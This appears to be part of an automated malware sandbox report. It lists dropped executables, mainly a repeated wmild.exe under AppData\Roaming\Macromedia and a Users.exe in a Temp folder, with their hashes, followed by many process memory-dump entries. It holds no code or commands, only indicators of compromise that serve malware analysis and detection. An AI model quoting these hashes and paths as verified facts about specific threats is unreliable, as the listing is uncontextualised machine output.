C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
\Users\Admin\AppData\Local\Temp\Users.exeFilesize
143KB
MD5f281cf95dc213f2bff31707319f12e52
SHA1cdf5667a12476eb13832e841b84fe7e06f69ef80
SHA2567d4b48559eea4f796bcae254548be0e843d58def5dedc0595b2623afc39cb8b3
SHA512bc8ebc87e7805f606faf50a6f6d96ed04ebb9f300ac40c6d6763f8e0dedf0a0e500c6f4d49373f5a639f4b06e02e81faf88658a93c62d4cfe520f2b445d63b33
-
\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
memory/652-122-0x0000000000000000-mapping.dmp
-
memory/656-76-0x0000000000000000-mapping.dmp
-
memory/772-65-0x0000000000000000-mapping.dmp
-
memory/868-66-0x0000000000000000-mapping.dmp
-
memory/908-80-0x00000000750C1000-0x00000000750C3000-memory.dmpFilesize
8KB
-
memory/908-78-0x0000000000000000-mapping.dmp
-
memory/944-55-0x0000000000000000-mapping.dmp
-
memory/960-54-0x0000000076571000-0x0000000076573000-memory.dmpFilesize
8KB
-
memory/1064-106-0x0000000000000000-mapping.dmp
-
memory/1144-94-0x0000000000000000-mapping.dmp
-
memory/1220-97-0x0000000000000000-mapping.dmp
-
memory/1288-115-0x0000000000000000-mapping.dmp
-
memory/1312-96-0x0000000000000000-mapping.dmp
-
memory/1352-62-0x0000000000000000-mapping.dmp
-
memory/1452-111-0x0000000000000000-mapping.dmp
-
memory/1464-92-0x0000000000000000-mapping.dmp
-
memory/1464-119-0x0000000000000000-mapping.dmp
-
memory/1512-93-0x0000000000000000-mapping.dmp
-
memory/1588-73-0x0000000000000000-mapping.dmp
-
memory/1692-91-0x0000000000000000-mapping.dmp
-
memory/1728-99-0x0000000000000000-mapping.dmp
-
memory/1736-98-0x0000000000000000-mapping.dmp
-
memory/1756-101-0x0000000000000000-mapping.dmp
-
memory/1764-123-0x0000000000000000-mapping.dmp
-
memory/1780-109-0x0000000000000000-mapping.dmp
-
memory/1912-70-0x0000000000000000-mapping.dmp
-
memory/1932-82-0x00000000039C0000-0x00000000039D0000-memory.dmpFilesize
64KB
-
memory/1932-81-0x000007FEFBF81000-0x000007FEFBF83000-memory.dmpFilesize
8KB
-
memory/1988-77-0x0000000000000000-mapping.dmp
-
memory/1992-105-0x0000000000000000-mapping.dmp
-
memory/1996-59-0x0000000000000000-mapping.dmp
-
memory/2004-63-0x0000000000000000-mapping.dmp
-
memory/2020-95-0x0000000000000000-mapping.dmp
-
memory/2036-90-0x0000000000000000-mapping.dmp
-
memory/2040-104-0x0000000000000000-mapping.dmp